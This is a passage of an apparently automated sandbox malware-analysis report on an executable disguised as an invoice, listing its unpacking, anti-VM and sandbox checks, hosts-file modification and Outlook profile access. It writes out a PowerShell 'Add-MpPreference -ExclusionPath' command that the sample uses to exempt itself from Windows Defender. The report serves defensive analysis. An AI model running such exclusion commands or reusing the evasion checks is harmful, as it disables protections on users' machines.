Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: INVOICE & TELEX BL_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: INVOICE & TELEX BL_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker
Source: INVOICE & TELEX BL_PDF.exe, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.INVOICE & TELEX BL_PDF.exe.2a0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.INVOICE & TELEX BL_PDF.exe.420000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.INVOICE & TELEX BL_PDF.exe.cb0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Code function: 7_2_0150D984 push esp; retf 7_2_0150D9D9
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Code function: 7_2_0150B4D0 push es; ret 7_2_0150B4E0
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Code function: 7_2_01504772 push 8BFFFFFFh; retf 7_2_01504778
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Code function: 7_2_0154D95C push eax; ret 7_2_0154D95D
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Code function: 7_2_0154E348 push eax; ret 7_2_0154E349
Source: initial sample | Static PE information: section name: .text entropy: 7.07881846434
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.26185cc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.314615327.0000000002647000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6008 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1244 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6016 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6328 | Thread sleep count: 929 > 30
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6328 | Thread sleep count: 8916 > 30
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1416
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Window / User API: threadDelayed 929
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Window / User API: threadDelayed 8916
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.320230845.00000000084B0000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: em%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: em"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.320230845.00000000084B0000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB5M94S28Win32_VideoControllerHVOCWFL7VideoController120060621000000.000000-00086743248display.infMSBDAXU2CCEX1PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors5BS6WHF3m
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01476AC0 LdrInitializeThunk,7_2_01476AC0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      Modifies the hosts file
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe File written: C:\Windows\System32\drivers\etc\hosts
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Process created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Process created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
